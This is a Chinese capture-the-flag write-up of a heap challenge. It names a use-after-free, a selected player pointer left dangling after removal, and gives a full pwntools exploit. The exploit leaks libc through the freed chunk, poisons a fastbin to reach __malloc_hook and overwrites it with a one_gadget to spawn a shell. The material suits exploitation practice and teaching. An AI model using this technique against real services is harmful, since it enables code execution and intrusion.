今天同学丢给我了一道堆题

题目链接:Github

这是一道花里胡哨的堆题

选项

  1. Exit
  2. Add player
  3. Remove player
  4. Select player
  5. Edit player
  6. Show player
  7. Show team

漏洞点

select操作会把一个player指针赋值给一个全局变量，就算remove了那个player，全局变量依旧存着它的指针，且可以利用edit函数进行操作

exp

from pwn import *
# NOTE(review): arch is set to i386 but the script packs/unpacks with p64/u64
# and loads an x86_64 libc below — the context arch looks stale; confirm the
# target binary is actually 64-bit. log_level='debug' prints every byte
# exchanged with the process, which is noisy but useful when a step hangs.
context(arch='i386',os='linux',log_level='debug')

# Thin aliases around the pwntools tube API. They reference `io`, which is
# only bound further down, so they must not be called before `io` exists.
sl = lambda x:io.sendline(x)
s = lambda x:io.send(x)
rn = lambda x:io.recv(x)
ru = lambda x:io.recvuntil(x, drop=True)
r = lambda :io.recv()
it = lambda: io.interactive()
# Logs a label together with a hex-formatted address.
success = lambda x, y:log.success(x + ' '+ hex(y))

binary = './choise'

io = process(binary)
# Hard-coded path to the local system libc: every offset used later in the
# script is specific to this exact libc build and will not transfer to another.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def menu(c):
    """Wait for the program's menu prompt and answer it with choice *c*.

    *c* is converted with ``str`` so both ints and strings are accepted.
    The helpers below pass 1..6, one less than the numbered list in the
    writeup — presumably the binary's menu is 0-based; verify against it.
    """
    choice = str(c)
    ru('Your choice: ')
    sl(choice)


def add(name, a, b, c, d):
    """Create a player through the "Add player" menu entry and return its slot.

    *name* is sent raw with ``send`` (the caller supplies its own newline);
    the four numeric stats are each sent as a line after their prompt.
    The slot index is parsed from the "Found free slot: N" line the
    program prints before asking for the name.
    """
    menu(1)
    ru('Found free slot: ')
    slot = int(ru('\n'))
    ru('Enter player name: ')
    s(name)
    # Each stat is answered in the order the program asks for it.
    stats = (
        ('Enter attack points: ', a),
        ('Enter defense points: ', b),
        ('Enter speed: ', c),
        ('Enter precision: ', d),
    )
    for prompt, value in stats:
        ru(prompt)
        sl(str(value))
    return slot


def remove(idx):
    """Free the player in slot *idx* via the "Remove player" entry.

    The program does not clear the pointer saved by ``select``, so a
    selected-then-removed player stays reachable through ``edit`` — the
    use-after-free this script relies on.
    """
    menu(2)
    index = str(idx)
    ru('Enter index: ')
    sl(index)

def select(idx):
    """Make slot *idx* the currently selected player ("Select player").

    The selection is stored in a global pointer inside the target and is
    what ``edit`` and ``showP`` operate on afterwards.
    """
    menu(3)
    index = str(idx)
    ru('Enter index: ')
    sl(index)

def edit(c, arg):
    """Rewrite a field of the currently selected player ("Edit player").

    *c* is the sub-menu choice (the script only ever uses 1, which asks
    for a new name — presumably the name field); *arg* is sent raw after
    the "Enter new name: " prompt. The short sleep gives the program time
    to drain its prompt before the payload arrives. The trailing '0' is
    presumably the "back" choice of the edit sub-menu; verify against
    the binary.
    """
    menu(4)
    menu(c)
    ru('Enter new name: ')
    sleep(0.1)
    s(arg)
    sl('0')

def showP():
    """Print the currently selected player ("Show player").

    Used after select+remove to read back the freed chunk's contents.
    """
    menu(5)

def showT():
    """Print the whole team ("Show team"). Defined but unused in this script."""
    menu(6)

# Two players with name buffers of different sizes; presumably chosen so the
# two name chunks land in different bins (0x7f -> a non-fastbin size, 0x60 ->
# a fastbin size) — confirm against the allocation sizes in the binary.
add('a'*0x7f+'\n', 1,1,1,1)
add('a'*0x60+'\n', 1,1,1,1)
# Root cause: select() stores the player pointer in a global and remove()
# never clears it, so the global keeps pointing at freed memory. The fix in
# the program would be to reset the selected pointer when that slot is freed.
select(0)
remove(0)
# Show the freed player: the name field now starts with allocator metadata
# (a bin pointer written by free), which leaks a libc address.
showP()
ru('Name: ')
leak = u64(ru('\n').ljust(8, '\x00'))
success('leak address', leak)
# Hard-coded distance from the leaked pointer to the libc base; only valid
# for the specific libc loaded above (looks like the usual main_arena
# unsorted-bin address of a glibc 2.23-era build — verify with pwndbg/one_gadget).
base = leak - 0x3c4b78
success('libc base', base)
libc.address = base
malloc_hook = libc.sym['__malloc_hook']
# Fake fastbin chunk just below __malloc_hook: the -0x23 offset is the usual
# one where the libc pointers nearby supply a size byte that passes the
# fastbin size check. Depends on this libc's layout.
chunk_addr = malloc_hook - 0x23
# one_gadget output for this libc, kept verbatim as a string literal for reference.
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
one_gadget = base + 0xf02a4
# Same dangling-pointer pattern on player 1, then edit() writes into the
# freed chunk, i.e. into its free-list link.
select(1)
remove(1)
# Three staged writes ending with the fake chunk address; presumably needed
# because the name write stops at a NUL/newline so the pointer's zero bytes
# cannot be written in one go — TODO confirm against the binary's read loop.
edit(1, 'a'*0x60+'\n')
edit(1, p64(chunk_addr+0xff000000000000)+'\n')
edit(1, p64(chunk_addr)+'\n')
# First add gets the original chunk back; the second is served the fake chunk
# at chunk_addr. 0x13 bytes of padding is the distance from that chunk's
# user data to __malloc_hook, so the gadget address is written over the hook.
add('a'*0x60+'\n', 1,1,1,1)
add('a'*0x13+p64(one_gadget)[:-2]+'a'*0x47+'\n', 1,1,1,1)
# Follow-up edits presumably trim the trailing filler so the hook value ends
# cleanly (same NUL/newline limitation as above) — verify.
select(1)
edit(1, 'a'*0x13+p64(one_gadget)[:-2]+'a'+'\n')
edit(1, 'a'*0x13+p64(one_gadget)[:-2]+'\n')
#gdb.attach(io,'b *0x401949')
#raw_input()
# Trigger another allocation (menu choice 1 = add, answered twice) so the
# overwritten __malloc_hook is called.
sl('1')
sl('1')
it()